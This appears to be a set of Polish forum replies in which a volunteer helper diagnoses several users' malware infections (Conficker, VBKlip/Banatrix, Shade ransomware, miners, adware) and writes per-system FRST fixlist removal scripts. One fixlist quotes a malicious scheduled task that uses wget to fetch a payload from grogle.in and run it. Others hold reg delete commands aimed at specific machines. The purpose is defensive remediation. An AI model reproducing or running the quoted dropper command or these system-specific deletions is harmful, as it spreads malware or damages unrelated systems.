picasso

No cóż, zgraja szkodników w starcie oraz ślady Confickera. Akcja do wdrożenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [!@#$%^&*] => C:\Documents and Settings\kopa\Dane aplikacji\startup\windows process.exe [397312 2015-04-07] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [ipEPckT79VF5HBMh8] => c:\documents and settings\kopa\dane aplikacji\ipepckt79vf5hbmh8\ipepckt79vf5hbmh8.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [X6jFQF2EIgKyy] => c:\documents and settings\kopa\dane aplikacji\x6jfqf2eigkyy\x6jfqf2eigkyy.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [hWmo1fj8e82cPa8O61270] => c:\documents and settings\kopa\dane aplikacji\hwmo1fj8e82cpa8o61270\hwmo1fj8e82cpa8o61270.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [YGbPFsIlT8] => c:\documents and settings\kopa\dane aplikacji\ygbpfsilt8\ygbpfsilt8.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [puClps3g10] => c:\documents and settings\kopa\dane aplikacji\puclps3g10\puclps3g10.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [kiGK7TSTZxt] => c:\documents and settings\kopa\dane aplikacji\kigk7tstzxt\kigk7tstzxt.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [iLg5qNIXVZw4xFuWC] => c:\documents and settings\kopa\dane aplikacji\ilg5qnixvzw4xfuwc\ilg5qnixvzw4xfuwc.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [AvsK2bgKNLwfyd2] => c:\documents and settings\kopa\dane aplikacji\avsk2bgknlwfyd2\avsk2bgknlwfyd2.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [m3TXGJLuoJt5LTNFWXAl] => "c:\documents and settings\kopa\dane aplikacji\m3txgjluojt5ltnfwxal\m3txgjluojt5ltnfwxal.exe" HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Run: [dx6pbHwbHMC05O] => c:\documents and settings\kopa\dane aplikacji\dx6pbhwbhmc05o\dx6pbhwbhmc05o.exe [638816 2009-03-08] (Microsoft Corporation) HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Policies\Explorer: [TaskbarNoNotification] 1 HKU\S-1-5-21-2094431546-3998815993-849199213-6447\...\Policies\Explorer: [HideSCAHealth] 1 HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1 HKLM\...\Policies\Explorer: [HideSCAHealth] 1 NETSVC: kfyarka -> C:\WINDOWS\system32\lkkalcuy.dll ==> No File. S2 kfyarka; C:\WINDOWS\system32\lkkalcuy.dll [X] CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> No File Path CustomCLSID: HKU\S-1-5-21-2094431546-3998815993-849199213-6447_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> No File Path C:\Documents and Settings\kopa\Dane aplikacji\29 A Sorted Ending.mp3 C:\Documents and Settings\kopa\Dane aplikacji\AvsK2bgKNLwfyd2 C:\Documents and Settings\kopa\Dane aplikacji\dx6pbHwbHMC05O C:\Documents and Settings\kopa\Dane aplikacji\hWmo1fj8e82cPa8O61270 C:\Documents and Settings\kopa\Dane aplikacji\ILg5qNIXVZw4xFuWC C:\Documents and Settings\kopa\Dane aplikacji\IpEPckT79VF5HBMh8 C:\Documents and Settings\kopa\Dane aplikacji\jhuikloyhj C:\Documents and Settings\kopa\Dane aplikacji\kiGK7TSTZxt C:\Documents and Settings\kopa\Dane aplikacji\m3TXGJLuoJt5LTNFWXAl C:\Documents and Settings\kopa\Dane aplikacji\puClps3g10 C:\Documents and Settings\kopa\Dane aplikacji\startup C:\Documents and Settings\kopa\Dane aplikacji\X6jFQF2EIgKyy C:\Documents and Settings\kopa\Dane aplikacji\YGbPFsIlT8 C:\Documents and Settings\agr\Dane aplikacji\Microsoft\Internet Explorer\Quick Launch\Skrót do Pokaż pulpit.lnk C:\Documents and Settings\agr\Dane aplikacji\Microsoft\Internet Explorer\Quick Launch\Skrót (2) do Pokaż pulpit.lnk DeleteKey: HKLM\SYSTEM\ControlSet002\Services\kfyarka Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Nastąpi restart. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Deinstalacje: - Odinstaluj stare wersje: Adobe Flash Player 10 ActiveX, Adobe Flash Player 11 Plugin, Adobe Reader 8 - Polish, Mozilla Firefox (3.0.19). Ten Firefox to szok. - Zresetuj cache wtyczek Google Chrome. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 3. Skoryguj tapetę użytkownika, gdyż log wskazuje, iż jest ustawiony plik z Temp: HKU\S-1-5-21-2094431546-3998815993-849199213-6447\Control Panel\Desktop\\Wallpaper -> C:\DOCUME~1\KOPALI~1\USTAWI~1\Temp\1.bmp 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition. Dołącz też plik fixlog.txt.

System jest zainfekowany dwoma typami: w Autostarcie uruchamia się malware update.vbs (pliki malware powstawały w tym samym przedziale czasowym co instalacja BSplayer PRO), w Harmonogramie zadań z kolei C:\ProgramData\dat.bmp (czyli wariant VBKlip/Banatrix). Działania do wdrożenia: 1. Przez Panel sterowania odinstaluj stare wersje i zbędniki: Adobe Flash Player 16 ActiveX, Adobe Flash Player 16 NPAPI, AVG Web TuneUp, Spybot - Search & Destroy. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Startup: C:\Users\olila\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs () Task: {8EEE3983-76EA-4F2F-8976-35675C6DC2B8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=By1vykaB59;setup.exe;1422133484 & start cmd /R dat.bmp Task: {FFEA7BD6-71D5-46AE-811F-D9D80A1F00D4} - System32\Tasks\{F9DC6CAF-D8FF-4391-8498-51137BA99E5A} => pcalua.exe -a "G:\! WSZYSTKIE PROGRAMY INSTALKI\Drukarki\Uninstall-sterowniki druk\brunins.exe" -d "G:\! WSZYSTKIE PROGRAMY INSTALKI\Drukarki\Uninstall-sterowniki druk" HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\...\Policies\Explorer: [NoLogOff] 0 HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\...\Run: [AdobeBridge] => [X] S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X] S3 cpuz136; \??\C:\Users\olila\AppData\Local\Temp\cpuz136\cpuz136_x64.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 IT9135BDA; System32\Drivers\IT9135BDA.sys [X] C:\ProgramData\dat.bmp C:\ProgramData\TEMP C:\Users\olila\AppData\Roaming\bsplayerpro.exe C:\Users\olila\AppData\Roaming\update.vbs C:\Windows\pss\update.vbs.Startup C:\Windows\SysWOW64\srvany.exe Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^olila^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^update.vbs" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Temat przenoszę do działu Windows. To nie jest problem infekcji tylko wynik uszkodzeń systemu. Po pierwsze oznaki uszkodzenia Winsock sygnalizowane błędem niemożności startu Dziennika. Po drugie usługi Microsoftu są widoczne na ustawieniu filtrującym, co wskazuje na uszkodzenia kluczy usług lub powiązanych plików. I to mogą być tylko powierzchowne znaki, logi są bardzo ograniczone tylko do określonych terenów i nie widać w nich po prostu wszystkiego. ==================== Event log errors: ========================= Could not start eventlog service, could not read events. Usługa Dziennik zdarzeń systemu Windows jest właśnie uruchamiana. Nie można uruchomić usługi Dziennik zdarzeń systemu Windows. Wystąpił błąd systemu. Wystąpił błąd systemu 1747. Usługa uwierzytelniania jest nieznana. ==================== Services (Whitelisted) ================= S3 IKEEXT; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) S3 IKEEXT; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S3 RasAuto; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) S3 RasAuto; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S3 upnphost; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) S3 upnphost; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) Wstępnie: 1. Start > w polu szukania wpisz cmd > z prawokliku Uruchom jako Administrator > wklej komendę i ENTER: sfc /scannow Gdy komenda ukończy działanie: 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CMD: netsh winsock reset CMD: findstr /c:"[sR]" %windir%\logs\cbs\cbs.log ListPermissions: HKLM\SYSTEM\CurrentControlSet\Services\IKEEXT ListPermissions: HKLM\SYSTEM\CurrentControlSet\Services\RasAuto ListPermissions: HKLM\SYSTEM\CurrentControlSet\Services\upnphost Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\IKEEXT /s Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\RasAuto /s Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\upnphost /s Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f HKU\S-1-5-21-2282721227-1211064884-3465515418-1000\...\Run: [Cudauro] => "C:\Users\Monika\AppData\Roaming\Cudauro\nircmd.exe" exec hide "C:\Users\Monika\AppData\Roaming\Cudauro\start.bat" Task: {8D71E75A-AB10-43D4-883C-A0480364D040} - System32\Tasks\{A51C4E87-B258-4182-8D0C-C614AC69FF58} => C:\Zuma\Zuma's Revenge!\ZumasRevenge.exe Task: {D7FA4652-45E2-4E21-9F3E-5FFFDFA9EFBF} - System32\Tasks\{D6D01155-A1CF-4943-8776-95AFACF3157F} => Iexplore.exe http://ui.skype.com/ui/0/5.3.0.120.259/pl/abandoninstall?page=tsDownload&installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-notinstalled U3 BTHPORT; \SystemRoot\System32\Drivers\BTHport.sys S3 ewusbmbb; system32\DRIVERS\ewusbwwan.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File C:\Users\Monika\AppData\Local\{00EB8D53-247A-4E5C-87A1-945A7838DC52} C:\Users\Monika\AppData\Local\{7A6A53C5-7419-4517-8682-8690A26E94AB} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa raporty. Dołącz też plik fixlog.txt. Wypowiedz się czy są jakiekolwiek zmiany.

Temat porządkuję. Logi proszę dołączaj w oryginalnej formie jako pliki w załącznikach, a nie na serwisach hostingowych. Obecnie jest ogromna ilość infekcji szyfrujących, a każdy wariant ma inną specyfikację i nie może być rozkodowany niepasującym narzędziem przeznaczonym do innej infekcji. To co jest u Ciebie to nie jest infekcja CryptoLocker tylko Trojan-Ransom.Win32.Shade (alias Ransom:Win32/Troldesh / Trojan.Encoder.858): KLIK / KLIK. Rozkodowanie plików jest awykonalne, niestety utrata danych. Ostatecznie sprawdź czy przeklejenie danych do tej wyszukiwarki Dr. Web coś zwróci, ale bardzo wątpię: KLIK. Z zaszyfrowanymi danymi nic nie jestem w stanie zrobić. Infekcja nadal jest czynna i w mojej gestii będzie jej wyczyszczenie oraz korekcja przejętej tapety: HKU\S-1-5-21-4079469416-385390291-1880624462-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Marcel\AppData\Roaming\A3C85375A3C85375.bmp Działania pod tym kątem: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-4079469416-385390291-1880624462-1000\...\Run: [minerd] => "C:\Users\Marcel\AppData\Roaming\minerd\nircmd.exe" exec hide "C:\Users\Marcel\AppData\Roaming\minerd\start.bat" HKU\S-1-5-21-4079469416-385390291-1880624462-1000\...\Run: [EA Core] => "C:\Program Files (x86)\Electronic Arts\EADM\Core.exe" -silent HKU\S-1-5-21-4079469416-385390291-1880624462-1000\...\Run: [Cabrate] => C:\Users\Marcel\AppData\Roaming\Shupdate\htmlsh.exe [90112 2015-03-23] () S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] AlternateDataStreams: C:\Users\Marcel\AppData\Local\Temporary Internet Files:0k2DkVxeKYjRagSejTpTO20UuMZr8 C:\ProgramData\.F4G6EEC4-B493-3E31-C6BG-8C6C9B764D36 C:\ProgramData\.ST160 C:\ProgramData\Windows C:\Users\Marcel\AppData\Local\.C3F2FH85-G3D2-2F02-D5CH-7D3D8C553E56 C:\Users\Marcel\AppData\Local\vu1xnNgDcHeXEzvvBuxT1OYCmvta+do0xgSnltS6nEs=.xtbl C:\Users\Marcel\AppData\Local\wC7H+mKgko5stZtOWYyxgUYqgPsYf5kGvCe1HJUkJXGTlMY-NQ6OSSAMNuKo2-3i.xtbl C:\Users\Marcel\AppData\Local\Google C:\Users\Marcel\AppData\Roaming\A3C85375A3C85375.bmp C:\Users\Marcel\AppData\Roaming\data13.dat C:\Users\Marcel\AppData\Roaming\lit1.22.exe C:\Users\Marcel\AppData\Roaming\Shupdate Folder: C:\Users\Marcel\AppData\Roaming\x11 Folder: C:\Users\Marcel\AppData\Roaming\x13 Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W punkcie pierwszym usuwam plik tapety, pozostanie martwe tło Pulpitu. Wejdź do opcji ustawiania tapety i wybierz dowolny niezaszyfrowany obraz. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Zasady działu nie zostały przeczytane: KLIK. Tu jest zakaz podpinania się pod cudze tematy (wydzielam w osobny) i zakaz wklejania logów bezpośrednio w postach (doczepiłam jako pliki). Załączniki dołącza się poprzez: pole szybkiej odpowiedzi na spodzie posta > Więcej opcji > w pełnym edytorze jest funkcja wsatawiania plików. Są tu ślady używania ComboFix i na ten temat: KLIK. Przeprowadź następujące działania: 1. Przez Dodaj/Usuń programy odinstaluj stare wersje: Adobe Flash Player 16 NPAPI, Adobe Flash Player 16 PPAPI, Java 7 Update 71, Java™ 6 Update 22, OpenOffice.org 3.3. Te Java są niebezpieczne, a OpenOffice w tej wersji nie współpracuje z nowszymi załatanymi Java. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: C:\WINDOWS\Tasks\APSnotifierPP1.job => C:\Program Files\AnyProtectEx\AnyProtect.exe Task: C:\WINDOWS\Tasks\APSnotifierPP2.job => C:\Program Files\AnyProtectEx\AnyProtect.exe Task: C:\WINDOWS\Tasks\APSnotifierPP3.job => C:\Program Files\AnyProtectEx\AnyProtect.exe Task: C:\WINDOWS\Tasks\FHUE.job => C:\Documents and Settings\operator\Dane aplikacji\FHUE.exe Task: C:\WINDOWS\Tasks\SMupdate2.job => C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll Task: C:\WINDOWS\Tasks\SMupdate3.job => C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll S3 catchme; \??\C:\DOCUME~1\ADMINI~1\USTAWI~1\Temp\catchme.sys [X] S0 cerc6; No ImagePath S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X] S3 filtertdidriver; system32\drivers\ewfiltertdidriver.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X] ShortcutWithArgument: C:\Documents and Settings\operator\Menu Start\Programy\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1420451576&from=smt&uid=WDCXWD800JD-75MSA3_WD-WMAM9FM9841498414 ShortcutWithArgument: C:\Documents and Settings\operator\Menu Start\Programy\Akcesoria\Narzędzia systemowe\Internet Explorer (bez dodatków).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1420451576&from=smt&uid=WDCXWD800JD-75MSA3_WD-WMAM9FM9841498414 StartMenuInternet: IEXPLORE.EXE - iexplore.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKU\S-1-5-21-220523388-1606980848-1905892399-1003\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch C:\Documents and Settings\All Users\Dane aplikacji\TEMP C:\Documents and Settings\operator\TempWmicBatchFile.bat C:\Documents and Settings\operator\Dane aplikacji\FHUE C:\Documents and Settings\operator\Dane aplikacji\LiveSupport.exe_log.txt C:\Documents and Settings\operator\Dane aplikacji\regsvr32.exe_log.txt C:\Documents and Settings\operator\Moje dokumenty\Moje obrazy\Przykładowe obrazy.lnk C:\Documents and Settings\operator\SendTo\AQQ.lnk C:\Documents and Settings\operator\Ustawienia lokalne\Dane aplikacji\nsaB6.tmp C:\Documents and Settings\operator\Ustawienia lokalne\Dane aplikacji\nsb165.tmp C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart, błąd startowy się nie powinien już pokazać. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Wszystkie logi mają być podane jako załączniki.

W systemie owszem grasują różne obiekty adware (głównie rodzina MultiPlug), ale BSODy to wcale nie muszą być związane z tym. Akcje do przeprowadzenia: 1. Przez Panel sterowania odinstaluj adware earnsale, PathFunc oraz stare wersje Adobe Flash Player 16 ActiveX, Java 7 Update 67. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 cewomose; C:\Users\NAS Tower\AppData\Roaming\03000200-1426602356-0500-0006-000700080009\jnsd5E64.tmp [125440 2015-03-17] () [File not signed] R2 HPSLPSVC; C:\Users\NAS Tower\AppData\Local\Temp\7zS75FE\hpslpsvc64.dll [1039360 2013-07-19] (Hewlett-Packard Co.) [File not signed] S3 cpuz138; \??\C:\Users\NASTOW~1\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] Startup: C:\Users\NAS Tower\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SuperOptimizer.lnk Task: {FE54BBFF-D760-4D96-82B2-AAD231A7E3EA} - System32\Tasks\{849D554E-1A5C-40EA-8855-D17F5661464B} => pcalua.exe -a "C:\Users\NAS Tower\Desktop\Norton Disk Doctor 2007\Norton Disk Doctor 2007.exe" -d "C:\Users\NAS Tower\Desktop\Norton Disk Doctor 2007" CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/ HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKLM -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_38_ff&cd=2XzuyEtN2Y1L1QzuzzzzzzzzzzzzzzzzzzyBzzzztCzytA0AtN0D0Tzu0SzyzyyEtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StByCtC0FtByBtAtBtGtAzz0C0BtG0CzztAyCtG0FyD0E0AtGtAtDtDzzyCyCzyzzyB0B0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCzzzy0AzyyBtDzytG0E0E0D0EtGyEyD0B0DtG0A0CtA0FtG0F0E0EtD0BtB0FyEyDtD0DyB2Q&cr=1253875195&ir= SearchScopes: HKLM -> {39118170-7B07-4BC5-8B47-C62B1DC1DC99} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_37_ff&cd=2XzuyEtN2Y1L1QzuzzzzzzzzzzzzzzzzzzyBzzzztCzytA0AtN0D0Tzu0SzyzzyBtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StByCtC0FtByBtAtBtGtAzz0C0BtG0CzztAyCtG0FyD0E0AtGtAtDtDzzyCyCzyzzyB0B0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCzzzy0AzyyBtDzytG0E0E0D0EtGyEyD0B0DtG0A0CtA0FtG0F0E0EtD0BtB0FyEyDtD0DyB2Q&cr=831071900&ir= SearchScopes: HKU\S-1-5-21-1906787049-347951299-1725668876-1000 -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_38_ff&cd=2XzuyEtN2Y1L1QzuzzzzzzzzzzzzzzzzzzyBzzzztCzytA0AtN0D0Tzu0SzyzyyEtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StByCtC0FtByBtAtBtGtAzz0C0BtG0CzztAyCtG0FyD0E0AtGtAtDtDzzyCyCzyzzyB0B0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCzzzy0AzyyBtDzytG0E0E0D0EtGyEyD0B0DtG0A0CtA0FtG0F0E0EtD0BtB0FyEyDtD0DyB2Q&cr=1253875195&ir= SearchScopes: HKU\S-1-5-21-1906787049-347951299-1725668876-1000 -> {39118170-7B07-4BC5-8B47-C62B1DC1DC99} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_37_ff&cd=2XzuyEtN2Y1L1QzuzzzzzzzzzzzzzzzzzzyBzzzztCzytA0AtN0D0Tzu0SzyzzyBtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StByCtC0FtByBtAtBtGtAzz0C0BtG0CzztAyCtG0FyD0E0AtGtAtDtDzzyCyCzyzzyB0B0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCzzzy0AzyyBtDzytG0E0E0D0EtGyEyD0B0DtG0A0CtA0FtG0F0E0EtD0BtB0FyEyDtD0DyB2Q&cr=831071900&ir= BHO: DolluarsaVer -> {94b11f41-69f7-448f-b75a-3afd1e0c7513} -> C:\Program Files (x86)\DolluarsaVer\z1Elf2NOxjFWp1.x64.dll [2015-04-09] () BHO: salePraizes -> {ddeff9d8-3348-4954-99b7-94ec35e9e3bc} -> C:\Program Files (x86)\salePraizes\vGUf6PamYtvMXp.x64.dll [2015-04-09] () BHO-x32: DolluarsaVer -> {94b11f41-69f7-448f-b75a-3afd1e0c7513} -> C:\Program Files (x86)\DolluarsaVer\z1Elf2NOxjFWp1.dll [2015-04-09] () BHO-x32: Digital More -> {c0b1016f-b7e5-46f0-b415-6bf9e55ab00d} -> C:\Program Files (x86)\Digital More\Extensions\c0b1016f-b7e5-46f0-b415-6bf9e55ab00d.dll No File BHO-x32: salePraizes -> {ddeff9d8-3348-4954-99b7-94ec35e9e3bc} -> C:\Program Files (x86)\salePraizes\vGUf6PamYtvMXp.dll [2015-04-09] () StartMenuInternet: IEXPLORE.EXE - iexplore.exe C:\Program Files (x86)\Digital More C:\Program Files (x86)\DolluarsaVer C:\Program Files (x86)\Google C:\Program Files (x86)\offeorsale C:\Program Files (x86)\PathFunc C:\Program Files (x86)\Pirate Bay Advanced Search C:\Program Files (x86)\salePraizes C:\ProgramData\{30654808-2713-30a2-3065-548082712020} C:\ProgramData\1015106777639025033 C:\ProgramData\777e9eb0000010dd C:\ProgramData\earnsale C:\Users\NAS Tower\AppData\Local\03000200-1426602550-0500-0006-000700080009 